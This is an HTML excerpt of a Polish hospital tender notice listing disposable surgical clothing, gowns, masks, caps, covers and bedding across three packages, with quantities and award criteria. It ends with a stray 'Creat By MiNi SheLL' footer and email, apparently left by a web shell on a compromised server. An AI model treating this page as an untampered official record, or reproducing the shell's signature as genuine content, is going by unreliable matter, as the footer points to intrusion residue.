Jednorazowy komplet operacyjny (bluza i spodnie) wykonany z włókniny polipropylenowej typu SMMS o gramaturze 38 gm2, kolor zielony, rozmiar L	szt.	4000
Jednorazowy komplet operacyjny (bluza i spodnie) wykonany z włókniny polipropylenowej typu SMMS o gramaturze 38 gm2, kolor niebieski, rozmiar XL	szt.	3000
Jednorazowy komplet operacyjny (bluza i spodnie) wykonany z włókniny polipropylenowej typu SMMS o gramaturze 38 gm2, kolor granatowy, rozmiar XXL	szt.	1500
Sterylny fartuch chirurgiczny wykonany z włókniny polipropylenowej typu SMMS, szwy łączone ultradźwiękowo, rękaw typu reglan zakończony elasycznym mankietem z dzianiny, wiązany na troki łączone kartonikiem sterylne plecy, zapinany na szyji na rzep, długość fartucha 130 cm, długośc rękawa 77 cm, rozm L	szt.	1000
Sterylny fartuch chirurgiczny wykonany z włókniny polipropylenowej typu SMMS, szwy łączone ultradźwiękowo, rękaw typu reglan zakończony elasycznym mankietem z dzianiny, wiązany na troki łączone kartonikiem sterylne plecy, zapinany na szyji na rzep, długość fartucha 150 cm, długośc rękawa 88 cm, rozm XL	szt.	1000
Osłona na kończyne długa 50 x 110 cm, a2 szt. 	kpl	100
Osłona na kończynę 25x80cm złożona teleskopowo z taśmą przylepną 10x50cm	kpl	50
Uchwyt typu rzep 2x23 cm	szt.	50
Osłona na stopę w kształcie buta wykonana z trójwarstwowej włókniny 40x22x8cm	szt.	50
Podkład chłonny nieprzemakalny z miękkiej rozdrobnionej celulozy rozmiar ok. 60x90	szt.	1500
Koszula przedoperacyjna dla pacjenta z włókniny polipropylenowej, granatowa, w kształcie tuniki wiązanej z tyłu na 2 pary troków, krótkie rękawy, rozmiar uniwersalny	szt.	1000
Kieszeń samoprzylepna na narzędzia 1 sekcyjna, 30x32 cm	szt.	500
Kieszeń samoprzylepna na narzędzia 2 sekcyjna, 43x38 cm	szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4, 33.19.90.00-1, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czepek chirurgiczny wiązany (o kroju furażerki ,z włókniny intensywnie pochłaniającej pot,o gramaturze min. 26g/m2 wiązany na linki, górna część czepka wykonana z włókniny wysokoparoprzepuszczalnej perforowanej o gramaturze min. 26g/m2)- rozmiar L, pakowane w kartoniki po max.50 szt.,(oznaczone zgodnie z ustawą o wyrobach medycznych z dnia 20.04.2004r.)	szt	7 500 
Czepek chirurgiczny wiązany (o kroju furażerki, z włókniny intensywnie pochłaniającej pot,o gramaturze min. 26g/m2, górna część czepka wykonana z włókniny wysokoparoprzepuszczalnej perforowanej o gramaturze min.26g/m2, wiązany na linki ) rozmiar XL, pakowany w kartoniki po max. 50 szt, (oznaczone zgodnie z ustawą o wyrobach medycznych z dnia 20.04.2004r.	szt	2 500 
Czepek pielęgniarski z gumką, zielony (duży okrągły czepek wykonany z włókniny polipropylenowej o gramaturze min. 15g/m2, pakowany w kartoniki po max. 50 szt.,( oznaczone zgodnie z ustawą o wyrobach medycznych)	szt	10000
Fartuch foliowy z cienkiej, mocnej folii o grubości min. 0,028mm, w roli a 50szt, biały	rol	120
Fartuch higieniczny biały z włókniny polipropylenowej o gramaturze min. 30g/m2.	szt	100
Fartuch higieniczny biały z włókniny polipropylenowej o gramaturze min. 30g/m2 z gumką w mankietach rozmiar XL	szt	500
Fartuch higieniczny zielony z włókniny polipropylenowej o gramaturze min. 30g/m2	szt	1 500 
Maska chirurgiczna z osłonką na oczy	szt	200 
Maska chirurgiczna pełnobarierowa z wykonana z trzech warstw wysokiej jakości włóknin, warstwa twarzowa nie posiadająca mikrowłosków, wyposażona w sztywnik zapewniajacy łatwe dopasowanie się maski do kształtu twarzy, wiązana na troki o dł. min. 40 cm, barierowość maski min. 95% (udokumentowana wysoka filtracja bakteryjna maski),  pakowana w kartoniki po max. 50 szt.,oznaczona zgodnie z ustawą o wyrobach medycznych z dnia 20.04.2004r.	szt	18 000 
Myjka do mycia i smarowania 1 x użytku wykonana z nieprzemakalnego laminatu papierowo-foliowego o gramaturze min. 50g/m2.	szt	35 000 
Pokrycie na kozetkę niejałowe, nieprzemakale zielone lub niebieskie rola 50mbx50cm, wykonane z pulpy celulozowej o gramaturze min. 29g/m2 oraz filmu PE o grubości min. 0,016mm	rol	500 
Pokrowiec na przewody (teleskopowo złożony z taśmami do mocowania na końcówkach, sterylny, wykonany z mocnej przeźroczystej folii PE o grubości min. 0,05mm	szt	1 200 
Prześcieradło 80*210 nieprzemakalne, wykonane z chłonnego i mocnego laminatu o gramaturze min. 60 g/m2, dodatkowo wzmocnione niebieskimi nitkami co około 17mm	szt	15 500 
Prześcieradło 80*175 nieprzemakalne, wykonane z chłonnego i mocnego laminatu o gramaturze min. 60g/m2, dodatkowo wzmocnione niebieskimi nitkami co około 17mm	szt	1 500 
Majtki do kolonoskopii	szt	500 
Okrycie termiczne operacyjne wykonane z  folii metalizowanej	szt	700 
Pokrowiec na aparaturę (wykonane z mocnej, przeźroczystej foli PE o grubości min. 0,05mm, umożliwiający łatwe nałożenie na przyrząd)	szt	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4, 33.19.90.00-1, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pościel flizelinowa , niesterylna (poszewka, poszwa, preścieradło) Komplet pościeli jednorazowego użytku wykonany z włókniny TMS o gramaturze 35 g / m 2 składający się z powłoki 200 cmx 150 cm, powłoczki 90cmx75cm i prześcieradła 210cmxl50-160cm. Powłoczki zszyte szwem obrzucającym, powinny posiadać odpowiednie zakładki zabezpieczające przed wysunięciem kołdry lub poduszki i zszyte.	kpl	500 
Prześcieradło flizelinowe, z włókniny polipropylenowej, niesterylne, jednorazowe,  o gramaturze 35g/m2 w rozmiarze 200 cmx 150 cm	szt	850.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4, 33.19.90.00-1, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com